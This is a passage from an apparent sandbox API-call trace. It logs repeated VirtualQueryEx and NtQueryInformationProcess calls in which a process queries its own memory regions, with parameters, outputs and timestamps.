VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966360000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966360000, AllocationBase=0x7ff966360000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.278] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.278] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96edf0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96edf0000, AllocationBase=0x7ff96edf0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.278] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.278] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff970e80000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff970e80000, AllocationBase=0x7ff970e80000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.278] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.278] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9662f0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9662f0000, AllocationBase=0x7ff9662f0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.278] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.278] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96b950000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96b950000, AllocationBase=0x7ff96b950000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.278] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.278] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966140000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966140000, AllocationBase=0x7ff966140000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.278] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.278] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x6190000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x6190000, AllocationBase=0x6190000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x883000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.279] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.279] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9660c0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9660c0000, AllocationBase=0x7ff9660c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.279] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.279] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966080000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966080000, AllocationBase=0x7ff966080000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.279] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.279] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977030000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977030000, AllocationBase=0x7ff977030000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.279] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.279] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965fb0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff965fb0000, AllocationBase=0x7ff965fb0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.279] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.279] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965fa0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff965fa0000, AllocationBase=0x7ff965fa0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.280] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.280] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965f00000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff965f00000, AllocationBase=0x7ff965f00000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.280] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.280] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9716a0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9716a0000, AllocationBase=0x7ff9716a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.280] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.280] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f7b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f7b0000, AllocationBase=0x7ff96f7b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.280] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.280] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973f10000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973f10000, AllocationBase=0x7ff973f10000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.280] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.280] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f600000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f600000, AllocationBase=0x7ff96f600000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.280] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.280] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96def0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96def0000, AllocationBase=0x7ff96def0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.280] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.280] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965e40000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff965e40000, AllocationBase=0x7ff965e40000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.280] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.280] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977460000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977460000, AllocationBase=0x7ff977460000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.280] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.281] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9710a0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9710a0000, AllocationBase=0x7ff9710a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.281] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.281] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974410000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974410000, AllocationBase=0x7ff974410000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.281] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.281] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9743d0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9743d0000, AllocationBase=0x7ff9743d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.281] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.281] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973d80000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973d80000, AllocationBase=0x7ff973d80000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.281] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.281] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96dd70000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96dd70000, AllocationBase=0x7ff96dd70000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.281] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.281] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96dec0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96dec0000, AllocationBase=0x7ff96dec0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.281] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.281] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f770000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f770000, AllocationBase=0x7ff96f770000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.281] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.281] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961e60000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961e60000, AllocationBase=0x7ff961e60000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.281] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.281] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961e00000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961e00000, AllocationBase=0x7ff961e00000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.281] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.282] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961c00000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961c00000, AllocationBase=0x7ff961c00000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.282] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.282] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971b50000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971b50000, AllocationBase=0x7ff971b50000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.282] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.282] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974790000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974790000, AllocationBase=0x7ff974790000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.282] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.282] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965aa0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff965aa0000, AllocationBase=0x7ff965aa0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.282] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.282] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965980000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff965980000, AllocationBase=0x7ff965980000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.282] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.282] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961960000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961960000, AllocationBase=0x7ff961960000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.282] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.282] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961910000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961910000, AllocationBase=0x7ff961910000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.282] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.282] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9617d0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9617d0000, AllocationBase=0x7ff9617d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.282] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.282] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971e70000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971e70000, AllocationBase=0x7ff971e70000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.282] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.283] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971df0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971df0000, AllocationBase=0x7ff971df0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.283] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.283] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961750000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961750000, AllocationBase=0x7ff961750000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.283] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.283] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9616c0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9616c0000, AllocationBase=0x7ff9616c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.283] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.283] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9616b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9616b0000, AllocationBase=0x7ff9616b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.283] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.283] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961630000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961630000, AllocationBase=0x7ff961630000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.283] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.283] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9615e0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9615e0000, AllocationBase=0x7ff9615e0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.283] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.283] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9615c0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9615c0000, AllocationBase=0x7ff9615c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.283] 